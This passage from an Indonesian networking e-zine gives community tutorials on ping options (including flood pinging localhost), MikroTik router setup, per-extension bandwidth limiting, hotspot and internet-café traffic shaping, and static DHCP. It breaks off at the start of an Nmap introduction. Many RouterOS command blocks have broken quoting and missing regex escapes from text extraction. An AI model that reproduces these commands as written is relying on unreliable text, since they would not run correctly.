terjangkau, cek dahulu apakah jaringan lokal adalah Up dan Running menggunakan salah satu dari tiga metode berikut : Ping localhost menggunakan nol (0), nama, dan IP address. Code: #ping 0 #ping localhost #ping 127.0.0.1 3. Mengirim paket N dan STOP Mengirim paket N ditentukan dengan opsi -c dan kemudian stop atau keluar secara otomatis (tanpa harus menekan CTRL+C untuk keluar). contoh : perintah ping mengirim 5 paketdan menunggu respon dari host tujuan. anda juga dapat mengunakan opsi -w untuk menspesifikasikan batas waktu mengirim output ping. Code: #ping -c google.com #ping -w 5 google.com
  • 21. 21e-ZIT #Vol 2 - Networking 4. Flood the Network Superuser dapat mengirim seratusatau lebih paket per detik menggunakan opsi -f. ini mencetak'.' ketika sebuah paket dikirimkan. contoh : ping -f telah mengirimkan lebih dari 400.000 paket dalam beberapa detik. Code: #ping -f localhost PING localhost.localadmin (127.0.0.1) 56(84) bytes of data. .^C 427412 packets transmitted, 427412 received, ada yang mau tambahin perintah lain pada ping... silahkan spesial thanks : http://www.gudasi.com/ ./regards shockw4v3
  • 22. 22e-ZIT #Vol 2 - Networking Mikrotik > Memberi Nama, Merubah Nama Interface, Setting IP Address dan NAT Akses mikrotik: 1. via console Mikrotik router board ataupun PC dapat diakses langsung via console/ shell maupun remote akses menggunakan putty. 2. via winbox Mikrotik bisa juga diakses/remote menggunakan software tool winbox. 3. via web Mikrotik juga dapat diakses via web/port 80 dengan menggunakan browser. Memberi Nama Mikrotik Code: [admin@Feenx_O] > system identity print name: "Mikrotik" [ropix@Feenx_O] > system identity edit value-name: name masuk ke editor ketik misal saya ganti dengan nama Feenx_O: Feenx_O C-c quit C-o save&quit C-u undo C-k cut line C-y paste Edit kemudian tekan Cltr-o untuk menyimpan dan keluar dari editor Mengganti Nama Interface Code: [admin@Feenx_O] > /interface print Flags: X - disabled, D - dynamic, R - running # NAME TYPE RX-RATE TX-RATE MTU 0 R ether1 ether 0 0 1500 1 R ether2 ether 0 0 1500 [admin@Feenx_O] > /interface edit 0 value-name: name Nilai 0 adalah nilai ether1, jika ingin mengganti ethet2 nilai 0 diganti dengan 1. masuk ke editor ketik missal saya ganti dengan nama LAN: LAN C-c quit C-o save&quit C-u undo C-k cut line C-y paste Edit kemudian tekan Cltr-o untuk menyimpan dan keluar dari editor
  • 23. 23e-ZIT #Vol 2 - Networking Lakukan hal yang sama untuk interface ether 2, sehingga jika dilihat lagi akan muncul seperti ini: [admin@Feenx_O] > /interface print Flags: X - disabled, D - dynamic, R - running # NAME TYPE RX-RATE TX-RATE MTU 0 R LAN ether 0 0 1500 1 R Hotspot ether 0 0 1500 setting ip address Code: [admin@Feenx_O] > /ip address add address: 192.168.1.1/24 interface: LAN [admin@Feenx_O] > /ip address print Flags: X - disabled, I - invalid, D - dynamic # ADDRESS NETWORK BROADCAST INTERFACE 0 192.168.0.254/24 192.168.0.0 192.168.0.255 LAN Masukkan IP addres value pada kolom address beserta netmask, masukkan nama interface yg ingin diberikan ip addressnya.Untuk Interface ke-2 yaitu interface hotspot, caranya sama dengan diatas, sehingga jika dilihat lagi akan menjadi 2 interface: [admin@Feenx_O] > /ip address print Flags: X - disabled, I - invalid, D - dynamic # ADDRESS NETWORK BROADCAST INTERFACE 0 192.168.0.254/24 192.168.0.0 192.168.0.255 LAN 1 202.51.192.42/29 202.51.192.40 202.51.192.47 Hotspot NAT Code: [admin@Feenx_O] > /ip firewall nat add chain=srcnat action=masquerade out- interface=LAN Catatan : dalam tutorial ini... saya mengakses mikrotik menggunakan winbox, dan membuat settingan didalam mikrotik menggunakan fitur "new terminal" yang ada didalam winbox. ./regards Feenx_O
  • 24. 24e-ZIT #Vol 2 - Networking Mikrotik > Management Bandwith Berdasarkan Extensi Ok waktunya ber experiment. Disini kita mencoba melimit bandwith berdasarkan extensi Ok langsung saja, sory kalau tulisannya rada kacau 1. buat layer7 nya, sedikit tentang layer 7 ( layer aplication) Layer Application adalah penghubung utama antara aplikasi yang berjalan pada satu komputer dan resources network yang membutuhkan akses padanya. Layer Application adalah layer dimana user akan beroperasi padanya, protocol seperti FTP, telnet, SMTP, HTTP, POP3 berada pada layer Application untuk pengaplikasiannya, pastekan sript dibawah ini ke terminal mikrotik : Code: /ip firewall layer7-protocol add name=http-video regexp="http/(0.9|1.0|1.1)[x09-x0d ][1-5][0-9][0-9][x09-x0d - ~]*(content-type: video) /ip firewall layer7-protocol add comment="" name="Extension " .exe "" regexp=".(exe)" /ip firewall layer7-protocol add comment="" name="Extension " .rar "" regexp=".(rar)" /ip firewall layer7-protocol add comment="" name="Extension " .zip "" regexp=".(zip)" /ip firewall layer7-protocol add comment="" name="Extension " .7z "" regexp=".(7z)" /ip firewall layer7-protocol add comment="" name="Extension " .cab "" regexp=".(cab)" /ip firewall layer7-protocol add comment="" name="Extension " .asf "" regexp=".(asf)" /ip firewall layer7-protocol add comment="" name="Extension " .mov "" regexp=".(mov)" /ip firewall layer7-protocol add comment="" name="Extension " .wmv "" regexp=".(wmv)" /ip firewall layer7-protocol add comment="" name="Extension " .mpg "" regexp=".(mpg)" /ip firewall layer7-protocol add comment="" name="Extension " .mpeg "" regexp=".(mpeg)" /ip firewall layer7-protocol add comment="" name="Extension " .mkv "" regexp=".(mkv)" /ip firewall layer7-protocol add comment="" name="Extension " .avi "" regexp=".(avi)" /ip firewall layer7-protocol add comment="" name="Extension " .flv "" regexp=".(flv)" /ip firewall layer7-protocol add comment="" name="Extension " .wav "" regexp=".(wav)" /ip firewall layer7-protocol add comment="" name="Extension " .rm "" regexp=".(rm)"
  • 25. 25e-ZIT #Vol 2 - Networking /ip firewall layer7-protocol add comment="" name="Extension " .mp3 "" regexp=".(mp3)" /ip firewall layer7-protocol add comment="" name="Extension " .mp4 "" regexp=".(mp4)" /ip firewall layer7-protocol add comment="" name="Extension " .ram "" regexp=".(ram)" /ip firewall layer7-protocol add comment="" name="Extension " .rmvb "" regexp=".(rmvb)" /ip firewall layer7-protocol add comment="" name="Extension " .dat "" regexp=".(dat)" /ip firewall layer7-protocol add comment="" name="Extension " .daa "" regexp=".(daa)" /ip firewall layer7-protocol add comment="" name="Extension " .iso "" regexp=".(iso)" /ip firewall layer7-protocol add comment="" name="Extension " .nrg "" regexp=".(nrg)" /ip firewall layer7-protocol add comment="" name="Extension " .bin "" regexp=".(bin)" /ip firewall layer7-protocol add comment="" name="Extension " .vcd "" regexp=.(vcd)" 2. setelah kita membuat layer7, selanjutnya kita membuat mangle. Ok sedikit tentang apa itu mangle, Mangle adalah semacam 'penanda' yang menandai paket untuk proses selanjutnya dengan tanda khusus. Seperti biasa, kita main copy paste lagi ^_^, masuk ke terminal, selajutnya pastekan perintah dibawah ini. Code: ip firewall mangle add action=mark-packet chain=prerouting comment="http- video mark-packet" disabled=no layer7-protocol=http-video new-packet- mark=http-video passthrough=no /ip firewall mangle add action=mark-connection chain=prerouting comment="7z DOWNS" disabled=no layer7-protocol="Extension " .7z "" new-connection- mark="7z DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment="" connection-mark="7z DOWNS" disabled=no new-packet-mark=7z passthrough=no protocol=tcp /ip firewall mangle add action=mark-connection chain=prerouting comment="asf DOWNS" disabled=no layer7-protocol="Extension " .asf "" new- connection-mark="asf DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment="" connection-mark="asf DOWNS" disabled=no new-packet-mark=asf passthrough=no protocol=tcp /ip firewall mangle add action=mark-connection chain=prerouting comment="avi DOWNS" disabled=no layer7-protocol="Extension " .avi "" new- connection-mark="avi DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment="" connection-mark="avi DOWNS" disabled=no new-packet-mark=avi passthrough=no protocol=tcp
  • 26. 26e-ZIT #Vol 2 - Networking /ip firewall mangle add action=mark-connection chain=prerouting comment="bin DOWNS" disabled=no layer7-protocol="Extension " .bin "" new- connection-mark="bin DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment="" connection-mark="bin DOWNS" disabled=no new-packet-mark=bin passthrough=no protocol=tcp /ip firewall mangle add action=mark-connection chain=prerouting comment="flv DOWNS" disabled=no layer7-protocol="Extension " .flv "" new- connection-mark="flv DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment="" connection-mark="flv DOWNS" disabled=no new-packet-mark=flv passthrough=no protocol=tcp /ip firewall mangle add action=mark-connection chain=prerouting comment="iso DOWNS" disabled=no layer7-protocol="Extension " .iso "" new- connection-mark="iso DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment="" connection-mark= "iso DOWNS" disabled=no new-packet-mark=iso passthrough=no protocol=tcp /ip firewall mangle add action=mark-connection chain=prerouting comment="mkv DOWNS" disabled=no layer7-protocol="Extension " .mkv "" new- connection-mark="mkv DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment="" connection-mark="mkv DOWNS" disabled=no new-packet-mark=mkv passthrough=no protocol=tcp /ip firewall mangle add action=mark-connection chain=prerouting comment="exe DOWNS" disabled=no layer7-protocol="Extension " .exe "" new- connection-mark="exe DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment="" connection-mark="exe DOWNS" disabled=no new-packet-mark=exe passthrough=no protocol=tcp /ip firewall mangle add action=mark-connection chain=prerouting comment="mov DOWNS" disabled=no layer7-protocol="Extension " .mov "" new- connection-mark="mov DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment="" connection-mark="mov DOWNS" disabled=no new-packet-mark=mov passthrough=no protocol=tcp /ip firewall mangle add action=mark-connection chain=prerouting comment="mp3 DOWNS" disabled=no layer7-protocol="Extension " .mp3 "" new- connection-mark="mp3 DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment="" connection-mark="mp3 DOWNS" disabled=no new-packet-mark=mp3 passthrough=no protocol=tcp /ip firewall mangle add action=mark-connection chain=prerouting comment="mp4 DOWNS" disabled=no layer7-protocol="Extension " .mp4 "" new- connection-mark="mp4 DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment="" connection-mark="mp4 DOWNS" disabled=no new-packet-mark=mp4 passthrough=no protocol=tcp /ip firewall mangle add action=mark-connection chain=prerouting comment="mpeg DOWNS" disabled=no layer7-protocol="Extension " .mpeg "" new-connection-mark="mpeg DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment="" connection-mark="mpeg DOWNS" disabled=no new-packet-mark=mpeg
  • 27. 27e-ZIT #Vol 2 - Networking passthrough=no protocol=tcp /ip firewall mangle add action=mark-connection chain=prerouting comment="mpg DOWNS" disabled=no layer7-protocol="Extension " .mpg "" new- connection-mark="mpg DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment="" connection-mark="mpg DOWNS" disabled=no new-packet-mark=mpg passthrough=no protocol=tcp /ip firewall mangle add action=mark-connection chain=prerouting comment="nrg DOWNS" disabled=no layer7-protocol="Extension " .nrg "" new- connection-mark="nrg DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment="" connection-mark="nrg DOWNS" disabled=no new-packet-mark=nrg passthrough=no protocol=tcp /ip firewall mangle add action=mark-connection chain=prerouting comment="ram DOWNS" disabled=no layer7-protocol="Extension " .ram "" new- connection-mark="ram DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment="" connection-mark="ram DOWNS" disabled=no new-packet-mark=ram passthrough=no protocol=tcp /ip firewall mangle add action=mark-connection chain=prerouting comment="rar DOWNS" disabled=no layer7-protocol="Extension " .rar "" new- connection-mark="rar DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment="" connection-mark="rar DOWNS" disabled=no new-packet-mark=rar passthrough=no protocol=tcp /ip firewall mangle add action=mark-connection chain=prerouting comment="rm DOWNS" disabled=no layer7-protocol="Extension " .rm "" new-connection- mark="rm DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment="" connection-mark="rm DOWNS" disabled=no new-packet-mark=rm passthrough=no protocol=tcp /ip firewall mangle add action=mark-connection chain=prerouting comment="rmvb DOWNS" disabled=no layer7-protocol="Extension " .rmvb "" new-connection-mark="rmvb DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment="" connection-mark="rmvb DOWNS" disabled=no new-packet-mark=rmvb passthrough=no protocol=tcp /ip firewall mangle add action=mark-connection chain=prerouting comment="wav DOWNS" disabled=no layer7-protocol="Extension " .wav "" new- connection-mark="wav DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment="" connection-mark="wav DOWNS" disabled=no new-packet-mark=wav passthrough=no protocol=tcp /ip firewall mangle add action=mark-connection chain=prerouting comment="wma DOWNS" disabled=no layer7-protocol="Extension " .wma "" new- connection-mark="wma DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment="" connection-mark="wma DOWNS" disabled=no new-packet-mark=wma passthrough=no protocol=tcp /ip firewall mangle add action=mark-connection chain=prerouting comment="wmv DOWNS" disabled=no layer7-protocol="Extension " .wmv "" new- connection-mark="wmv DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment=""
  • 28. 28e-ZIT #Vol 2 - Networking connection-mark="wmv DOWNS" disabled=no new-packet-mark=wmv passthrough=no protocol=tcp /ip firewall mangle add action=mark-connection chain=prerouting comment="zip DOWNS" disabled=no layer7-protocol="Extension " .zip "" new- connection-mark="zip DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment="" connection-mark="zip DOWNS" disabled=no new-packet-mark=zip passthrough=no protocol=tcp /ip firewall mangle add action=mark-connection chain=prerouting comment="youtube DOWNS" disabled=no layer7-protocol="YouTube " new- connection-mark="youtube DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment="" connection-mark="youtube DOWNS" disabled=no new-packet-mark=youtube passthrough=no protocol=tcp /ip firewall mangle add action=mark-connection chain=prerouting comment="daa DOWNS" disabled=no layer7-protocol="Extension " .daa "" new- connection-mark="daa DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment="" connection-mark="daa DOWNS" disabled=no new-packet-mark=daa passthrough=no protocol=tcp /ip firewall mangle add action=mark-connection chain=prerouting comment="dat DOWNS" disabled=no layer7-protocol="Extension " .dat "" new- connection-mark="dat DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment="" connection-mark="dat DOWNS" disabled=no new-packet-mark=dat passthrough=no protocol=tcp /ip firewall mangle add action=mark-connection chain=prerouting comment="vcd DOWNS" disabled=no layer7-protocol="Extension " .vcd "" new- connection-mark="vcd DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment="" connection-mark="vcd DOWNS" disabled=no new-packet-mark=vcd passthrough=no protocol=tcp /ip firewall mangle add action=mark-connection chain=prerouting comment="cab DOWNS" disabled=no layer7-protocol="Extension " .cab "" new- connection-mark="cab DOWNS" passthrough=yes protocol=tcp /ip firewall mangle add action=mark-packet chain=postrouting comment="" connection-mark="cab DOWNS" disabled=no new-packet-mark=cab passthrough=no protocol=tcp 3. selajutnya tahap akhir, yaitu managemen bandwith. Disini kita menggunakan simple queue. Yah seperti biasa kita kita gunakan metode yang sangat umum :”COPY PASTE”: masuk ke terminal mikrotik dan pastekan perintah dibawah ini : Code: /queue simple add name="exe" dst-address=0.0.0.0/0 interface=all parent=none packet-marks=exe direction=both priority=8 queue=default- small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst- threshold=0/0 burst-time=0s/0s total-queue=default-small /queue simple add name="rar" dst-address=0.0.0.0/0 interface=all parent=none packet-marks=rar direction=both priority=8 queue=default-
  • 29. 29e-ZIT #Vol 2 - Networking small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst- threshold=0/0 burst-time=0s/0s total-queue=default-small /queue simple add name="zip" dst-address=0.0.0.0/0 interface=all parent=none packet-marks=zip direction=both priority=8 queue=default- small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst- threshold=0/0 burst-time=0s/0s total-queue=default-small /queue simple add name="7z" dst-address=0.0.0.0/0 interface=all parent=none packet-marks=7z direction=both priority=8 queue=default-small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-threshold=0/0 burst- time=0s/0s total-queue=default-small /queue simple add name="cab" dst-address=0.0.0.0/0 interface=all parent=none packet-marks=cab direction=both priority=8 queue=default- small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst- threshold=0/0 burst-time=0s/0s total-queue=default-small /queue simple add name="asf" dst-address=0.0.0.0/0 interface=all parent=none packet-marks=asf direction=both priority=8 queue=default- small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst- threshold=0/0 burst-time=0s/0s total-queue=default-small /queue simple add name="mov" dst-address=0.0.0.0/0 interface=all parent=none packet-marks=mov direction=both priority=8 queue=default- small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst- threshold=0/0 burst-time=0s/0s total-queue=default-small /queue simple add name="wmv" dst-address=0.0.0.0/0 interface=all parent=none packet-marks=wmv direction=both priority=8 queue=default- small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst- threshold=0/0 burst-time=0s/0s total-queue=default-small /queue simple add name="mpg" dst-address=0.0.0.0/0 interface=all parent=none packet-marks=mpg direction=both priority=8 queue=default- small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst- threshold=0/0 burst-time=0s/0s total-queue=default-small /queue simple add name="mpeg" dst-address=0.0.0.0/0 interface=all parent=none packet-marks=mpeg direction=both priority=8 queue=default- small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst- threshold=0/0 burst-time=0s/0s total-queue=default-small /queue simple add name="mkv" dst-address=0.0.0.0/0 interface=all parent=none packet-marks=mkv direction=both priority=8 queue=default- small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst- threshold=0/0 burst-time=0s/0s total-queue=default-small /queue simple add name="avi" dst-address=0.0.0.0/0 interface=all parent=none packet-marks=avi direction=both priority=8 queue=default- small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst- threshold=0/0 burst-time=0s/0s total-queue=default-small /queue simple add name="flv" dst-address=0.0.0.0/0 interface=all parent=none packet-marks=flv direction=both priority=8 queue=default- small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst- threshold=0/0 burst-time=0s/0s total-queue=default-small /queue simple add name="wav" dst-address=0.0.0.0/0 interface=all parent=none packet-marks=wav direction=both priority=8 queue=default- small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst- threshold=0/0 burst-time=0s/0s total-queue=default-small /queue simple add name="rm" dst-address=0.0.0.0/0 interface=all parent=none packet-marks=rm direction=both priority=8 queue=default-small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-threshold=0/0 burst-
  • 30. 30e-ZIT #Vol 2 - Networking time=0s/0s total-queue=default-small /queue simple add name="mp3" dst-address=0.0.0.0/0 interface=all parent=none packet-marks=mp3 direction=both priority=8 queue=default- small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst- threshold=0/0 burst-time=0s/0s total-queue=default-small /queue simple add name="mp4" dst-address=0.0.0.0/0 interface=all parent=none packet-marks=mp4 direction=both priority=8 queue=default- small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst- threshold=0/0 burst-time=0s/0s total-queue=default-small /queue simple add name="ram" dst-address=0.0.0.0/0 interface=all parent=none packet-marks=ram direction=both priority=8 queue=default- small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst- threshold=0/0 burst-time=0s/0s total-queue=default-small /queue simple add name="rmvb" dst-address=0.0.0.0/0 interface=all parent=none packet-marks=rmvb direction=both priority=8 queue=default- small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst- threshold=0/0 burst-time=0s/0s total-queue=default-small /queue simple add name="dat" dst-address=0.0.0.0/0 interface=all parent=none packet-marks=dat direction=both priority=8 queue=default- small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst- threshold=0/0 burst-time=0s/0s total-queue=default-small /queue simple add name="daa" dst-address=0.0.0.0/0 interface=all parent=none packet-marks=daa direction=both priority=8 queue=default- small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst- threshold=0/0 burst-time=0s/0s total-queue=default-small /queue simple add name="iso" dst-address=0.0.0.0/0 interface=all parent=none packet-marks=iso direction=both priority=8 queue=default- small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst- threshold=0/0 burst-time=0s/0s total-queue=default-small /queue simple add name="nrg" dst-address=0.0.0.0/0 interface=all parent=none packet-marks=nrg direction=both priority=8 queue=default- small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst- threshold=0/0 burst-time=0s/0s total-queue=default-small /queue simple add name="bin" dst-address=0.0.0.0/0 interface=all parent=none packet-marks=bin direction=both priority=8 queue=default- small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst- threshold=0/0 burst-time=0s/0s total-queue=default-small /queue simple add name="vcd" dst-address=0.0.0.0/0 interface=all parent=none packet-marks=vcd direction=both priority=8 queue=default- small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst- threshold=0/0 burst-time=0s/0s total-queue=default-small ip firewall mangle add action=mark-packet chain=prerouting comment="http- video mark-packet" disabled=no layer7-protocol=http-video new-packet- mark=http-video passthrough=no /queue simple add name="youtube" dst-address=0.0.0.0/0 interface=all parent=none packet-marks=http-video direction=both priority=8 queue=default-small/default-small limit-at=0/0 max-limit=32k/32k burst- limit=0/0 burst-threshold=0/0 burst-time=0s/0s total-queue=default-small Sumber : http://www.wiki.mikrotik.com
  • 31. 31e-ZIT #Vol 2 - Networking sory kalau configurasinya bukan dari awal configurasi, disini saya menganggap anda telah sukses mengkonfigurasi mikrotiknya hingga terkoneksi :peace: :peace: ket : experiment ini sangat cocok buat warnet dgn bandwidth kecil atau terbatas (contoh kasus : warnet saya dulu) (khusus indonesia bagian timur yang harga bandwitdh mahal) ./regards shockw4v3
  • 32. 32e-ZIT #Vol 2 - Networking Mikrotik > Cara Sederhana Membuat Hotspot I'm comeback again...!!! tanpa banyak basa basi lagi... mari kita lihat gimana caranya mengconfigurasi mikrotik untuk membuat jaringan hotspot... cekidot :dance: beri ip masing-masing LAN CARD!! Code: [admin@Mikrotik] > ip address add address=192.168.0.2/30 interface=UpLink [admin@Mikrotik] > ip address add address=192.168.1.1/24 interface=Lokal [admin@Mikrotik] > ip address add address=192.168.2.1/24 interface=HotSpot interface=HotSpot ini adalah koneksi ke wireless (wifi) kita Masukkan default routenya Code: [admin@MikroTik] > ip route add gateway 192.168.0.1 Kemudian Setting HotSpotnya Code: [admin@MikroTik] > ip hotspot setup hotspot interface: HotSpot local address of network: 192.168.2.1/24 masquerade network: yes address pool of network: 192.168.2.2-192.168.2.99 select certificate: none ip address of smtp server: 0.0.0.0 dns servers: 192.168.2.1 dns name: hotspot.com name of local hotspot user: user password for the user: ****password*** (user & password ganti terserah kita) ok! sampai disini... settingan hotspot telah berhasil dilakukan dan siap dipakai.... ./regards Feenx_O
  • 33. 33e-ZIT #Vol 2 - Networking Mikrotik > Pisah Download, Browse & Game di 1 Line ini kisah cerita waktu tahun 2009 :maybe: pada kebingungan pas waktu di suruh bos buka warnet + game online dengan 1 line isp..... akhirnya nemu juga cara setingnya.... nah sekarang langsung aja ah….. Test running well di RB450 OS ver.4.5 ISP= Astinet TALIKOM 1Mbps Mangle: GAME contoh buat Point Blank, game lain sesuaikan aja port/ip nya karna ane cuma sediakan Point Blank aja di warnet :) Code: chain=game action=mark-connection new-connection-mark=Game passthrough=yes protocol=tcp dst-address=203.89.146.0/23 dst-port=39190 comment=”Point Blank” Code: chain=game action=mark-connection new-connection-mark=Game passthrough=yes protocol=udp dst-address=203.89.146.0/23 dst-port=40000-40010 Code: chain=game action=mark-packet new-packet-mark=Game_pkt passthrough=no connection-mark=Game Code: chain=prerouting action=jump jump-target=game POKER - paling banyak main bahkan game FB terlaris di kota ane untuk saat itu Code: chain=forward action=mark-connection new-connection-mark=Poker_con passthrough=yes protocol=tcp dst-address-list=LOAD POKER comment=”POKER” Code: chain=forward action=mark-connection new-connection-mark=Poker_con passthrough=yes protocol=tcp content=statics.poker.static.zynga.com Code: chain=forward action=mark-packet new-packet-mark=Poker passthrough=no connection-mark=Poker_con
  • 34. 34e-ZIT #Vol 2 - Networking BROWSING Code: chain=forward action=mark-connection new-connection-mark=http passthrough=yes protocol=tcp in-interface=WAN out-interface=Lan packet- mark=!Game_pkt connection-mark=!Game connection-bytes=0-262146 comment=”BROWSE” Code: chain=forward action=mark-packet new-packet-mark=http_pkt passthrough=no protocol=tcp connection-mark=http UPLOAD Code: chain=prerouting action=mark-packet new-packet-mark=Upload passthrough=no protocol=tcp src-address=192.168.0.0/24 in-interface=Lan packet- mark=!icmp_pkt comment=”UPLOAD” LIMIT DOWNLOAD Code: chain=forward action=mark-connection new-connection-mark=Download passthrough=yes protocol=tcp in-interface=WAN out-interface=Lan packet- mark=!Game_pkt connection-mark=!Poker_con connection bytes=262146- 4294967295 comment=”LIMIT DOWNLOAD” Code: chain=forward action=mark-packet new-packet-mark=Download_pkt passthrough=no packet-mark=!Game_pk> connection-mark=Download QUEUE queue type Code: name=”Download” kind=pcq pcq-rate=256000 pcq-limit=50 pcq-classifier=dst- address pcq-total-limit=2000 Code: name=”Http” kind=pcq pcq-rate=1M pcq-limit=50 pcq-classifier=dst-address pcq-total-limit=2000 Code: name=”Game” kind=pcq pcq-rate=0 pcq-limit=50 pcq-classifier=src- address,dst-address,src-port,dst-port pcq-total-limit=2000 Code: name=”Upload” kind=pcq pcq-rate=0 pcq-limit=50 pcq-classifier=src-address pcq-total-limit=2000
  • 35. 35e-ZIT #Vol 2 - Networking Queue Tree Code: name=”Main Browse” parent=Lan limit-at=0 priority=8 max-limit=1M burst- limit=0 burst-threshold=0 burst-time=0s Code: name=”Browse” parent=Main Browse packet-mark=http_pkt limit-at=0 queue=Http priority=8 max-limit=1M burst-limit=0 burst-threshold=0 burst-time=0s Code: name=”Game” parent=global-total packet-mark=Game_pkt limit-at=0 queue=Game priority=1 max-limit=0 burst-limit=0 burst-threshold=0 burst-time=0s Code: name=”Poker” parent=global-out packet-mark=Poker limit-at=0 queue=Game priority=3 max-limit=0 burst-limit=0 burst-threshold=0 burst-time=0s Code: name=”Download” parent=global-out packet-mark=Download_pkt limit-at=0 queue=Download priority=8 max-limit=256k burst-limit=0 burst-threshold=0 burst-time=0s Code: name=”Main Upload” parent=global-in limit-at=0 priority=8 max-limit=256k burst-limit=0 burst-threshold=0 burst-time=0s Code: name=”Upload” parent=Main Upload packet-mark=Upload limit-at=0 queue=Upload priority=8 max-limit=0 burst-limit=0 burst-threshold=0 burst-time=0s HASILNYA BROWSING 1Mbs > bagi rata 1 warnet DOWNLOAD 256Kbps > bagi rata 1 warnet GAME > seadanya bandwith sesuai kebutuhan 1 warnet POKER > seadanya bandwith sesuai kebutuhan 1 warnet UPLOAD > seadanya bandwith bagi rata sesuai kebutuhan 1 warnet mungkin setingan ini belum sempurna.... buat kk ama om yg lain mungkin bisa kasih pencerahan ato tambahan ./regards shockw4f3
  • 36. 36e-ZIT #Vol 2 - Networking Mikrotik > Leases Static DHCP Kebetulan ne cara mau dipake buat keperluan sendiri. Berhubung Hotspot di kantor pake DHCP, trus HP yang connect juga sering dipake buat experiment di LAN, tapi karena IP LAN nya DHCP jadinya server di HP jadi berubah-ubah. Dan karena tidak ada opsi untuk setting IP di HP, jadi solusinya adalah meminjamkan IP dari DHCP secara statik dari mikrotik. Yarp, langsung ke command nya ja... Code: [admin@MikroTik] > /ip dhcp-server lease add address=1.2.3.4 mac- address=aa:bb:cc:dd:ee:ff server=dhcp_pool_name disabled=no Simple aja sih, untuk parameternya tinggal menyesuaikan device masing-masing yang akan di set. Kalo Static DHCP nya banyak, biar gak bingung, masing-masing rules diatas tambahkan parameter "comment". Ah, kayaknya udah pada tauk :D Semoga bermanfaat ja buat yang belum tau. ^_^ Source: http://forum.mikrotik.com/viewtopic.php?f=13&t=42587 ./regards JMozac
  • 37. 37e-ZIT #Vol 2 - Networking Network Scanning With NMAP Halooooooo Heuheu, Yup ketemu lagi sama Bifi, pada thread sebelummnya kan kaka shockw4v3, udah bagi-bagi tips tentang command- command ping kan, itu lho command atau apalah, bawaan hampir semua OS untuk mengecek komunikasi antar komputer dalam sebuah jaringan melalui protocol TCP/IP,,, Nah seperti gambar di atas, Kali ini Bifi mau share tentang tips network scanning with Nmap, atau bahasa torang dong bilang scan jaringan pake Nmap, nah apa itu Nmap ??? Ini dia penjelasannya : "Nmap (“Network Mapper”) merupakan sebuah tool open source untuk eksplorasi dan audit keamanan jaringan. Ia dirancang untuk memeriksa jaringan besar secara cepat, meskipun ia dapat pula bekerja terhadap host tunggal. Nmap menggunakan paket IP raw dalam cara yang canggih untuk menentukan host mana saja yang tersedia pada jaringan, layanan (nama aplikasi dan versi) apa yang diberikan, sistem operasi (dan versinya) apa yang digunakan, apa jenis firewall/filter paket yang digunakan, dan sejumlah karakteristik lainnya" di kutip dari situs resmi NMAP... nah, untuk para networker, pasti udah nggak asing lagi dengan tools yang 1 